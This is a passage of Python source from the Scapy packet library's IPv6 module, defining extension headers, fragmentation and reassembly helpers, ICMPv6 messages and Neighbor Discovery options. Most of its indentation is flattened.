if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
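# A minimal sketch of the autopad machinery: a Hop-by-Hop header carrying a
# single 4-byte Router Alert option is padded to a multiple of 8 octets
# automatically (2-byte header + 4-byte option + 2-byte PadN = 8).
def _hbh_autopad_sketch():
    return len(str(IPv6ExtHdrHopByHop(options=[RouterAlert(value=0)])))   # -> 8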
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. Missing data is filled in with 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
    res = []
    while l:
        min_pos = 0
        min_offset = l[0][IPv6ExtHdrFragment].offset
        for pos, p in enumerate(l):
            cur_offset = p[IPv6ExtHdrFragment].offset
            if cur_offset < min_offset:
                min_pos = pos    # track the fragment with the smallest offset
                min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
    Performs fragmentation of an IPv6 packet. The provided packet ('pkt')
    must already contain an IPv6ExtHdrFragment() class. The 'fragSize'
    argument is the expected maximum size of the fragments (MTU). The list
    of packets is returned.
    If the packet does not contain an IPv6ExtHdrFragment class, it is
    returned as the single element of the result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can't be bigger than 65535 bytes, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets; the last fragment
    # can be anything below the MTU.
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
    fragOffset = 0 # offset, incremented during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
            fragHeader.offset = fragOffset # update offset
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
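# A minimal round-trip sketch (hypothetical destination): insert a Fragment
# header, cut to a 1280-byte MTU, then reassemble.
def _fragment_roundtrip_sketch():
    p = IPv6(dst="fe80::1")/IPv6ExtHdrFragment()/ICMPv6EchoRequest(data="A"*1800)
    frags = fragment6(p, 1280)    # list of IPv6 packets, each <= 1280 bytes
    return defragment6(frags)     # -> the reassembled IPv6 packet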
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
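# A minimal matching sketch (loopback addresses): a reply answers a request
# only when id, seq and data are all equal.
def _echo_match_sketch():
    req = IPv6(dst="::1")/ICMPv6EchoRequest(id=0x42, seq=1, data="x")
    rep = IPv6(dst="::1")/ICMPv6EchoReply(id=0x42, seq=1, data="x")
    return rep.answers(req)   # -> True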
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# All MLD messages are sent with a link-local source address
# -> ensure this in post_build if none is specified
# The Hop-Limit value must be 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return struct.pack("HH",self.mladdr)+self.payload.hashret()
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# TODO: implement hashret() and answers()
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: revisit the use of ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
        try: # It can happen that we have something shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Add a post_build to recompute the size (as a multiple of 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
from scapy.layers.dhcp6 import DomainNameListField
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x/8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
